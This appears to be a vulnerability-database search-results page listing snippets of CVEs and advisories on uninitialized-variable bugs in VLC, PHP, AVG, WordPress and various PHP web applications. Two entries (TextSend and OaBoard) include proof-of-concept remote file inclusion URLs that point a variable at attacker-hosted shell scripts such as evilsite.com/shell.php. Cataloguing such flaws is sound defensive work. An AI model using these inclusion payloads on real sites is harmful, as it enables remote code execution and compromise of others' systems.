1104 matches found
CVE-2007-3468
input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service (crash) via a crafted WAV file that causes an uninitialized i_nb_resamplers variable to be used...
DEBIAN-CVE-2007-3468
input.c in VideoLAN VLC Media Player before 0.8.6c allows remote attackers to cause a denial of service (crash) via a crafted WAV file that causes an uninitialized i_nb_resamplers variable to be used...
VLC 0.8.6b format string vulnerability & integer overflow
iSEC Partners Security Advisory - 2007-001-vlc http://www.isecpartners.com VLC 0.8.6b format string vulnerability & integer overflow Vendor: VideoLan Vendor URL: http://www.videolan.org Systems Affected: Confirmed on Windows XP, FreeBSD 6.2, MacOS X...
Code injection
Symantec Reporting Server 1.0.197.0, and other versions before 1.0.224.0, as used in Symantec Client Security 3.1 and later, and Symantec AntiVirus Corporate Edition SAV CE 10.1 and later, does not initialize a critical variable, which allows attackers to create arbitrary executable files via...
vlc -- format string vulnerability and integer overflow
isecpartners reports: VLC is vulnerable to a format string attack in the parsing of Vorbis comments in Ogg Vorbis and Ogg Theora files, CDDA data or SAP/SDP service discovery messages. Additionally, there are two errors in the handling of wav files, one a denial of service due to an uninitialized...
PT-2007-4044 · Php · Php
Name of the Vulnerable Software and Affected Versions: PHP affected versions not specified Description: A design error in the make_http_soap_request function in PHP's soap extension causes it to call php_rand_r with an uninitialized variable, potentially leading to weak encryption of sensitive...
security flaw
The aio_setup_ring function in Linux kernel does not properly initialize a variable, which allows local users to cause a denial of service (crash) via an unspecified error path that causes an incorrect free operation...
TextSend <= 1.5 (config/sender.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ===================================================================== TextSend include "$ROOTPATH/config.php"; + + Proof Of Concept: + http://target/path/config/sender.php?ROOTPATH=http://evilsite.com/shell.php?...
Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability
No description provided by source. Paristemi 0.8.3b buycd.php Remote File Include Vulnerability Vendor...
CVE-2006-5938
Grisoft AVG Anti-Virus before 7.1.407 has unknown impact and remote attack vectors involving an uninitialized variable and a crafted CAB file...
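AVG Anti-Virus multiple remote code execution vulnerabilities
AVG Anti-Virus is a full-featured antivirus program. The file parsing engine of AVG Anti-Virus contains multiple vulnerabilities; those identified so far include: - an integer overflow when parsing .CAB files that may lead to a heap overflow; - an uninitialized variable when parsing .CAB files; - a divide by zero when parsing .DOC files; - an integer overflow when parsing .RAR files that may lead to a heap overflow; - integer issues when parsing .EXE files. If an attacker creates a specially crafted file, these vulnerabilities may lead to remote execution of arbitrary code. Grisoft AVG Anti-Virus 7.1.407 The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage:...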
Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
No description provided by source. Segue CMS <= 1.5.8 themesdir Remote File Include Vulnerability Affected...
CVE-2006-3615
Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...
OaBoard 1.0 Remote File inclusion
OaBoard version 1.x has a remote file inclusion. The variable $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...
Remote file inclusion
PHP remote file inclusion vulnerability in common.php in Intensive Point iUser Ecommerce allows remote attackers to include arbitrary files via a URL in the includepath variable, which is not initialized before being used...
Tolva.txt
Script: Tolva PHP website system Version: 0.1.0 Language: PHP Official Website: http://sourceforge.net/projects/twebs Problem: Remote File Include Discovered by: beford Description: ============ A complete collection of php scripts that work tightly together to create a highly customizable, dynam...
Fedora Core 3 : mysql-3.23.58-16.FC3.1 (2005-304)
Sat Apr 2 2005 Tom Lane 3.23.58-16.FC3.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Sat Mar 19 2005 Tom Lane 3.23.58-15.FC3.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...
DEBIAN-CVE-2005-2109
wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use...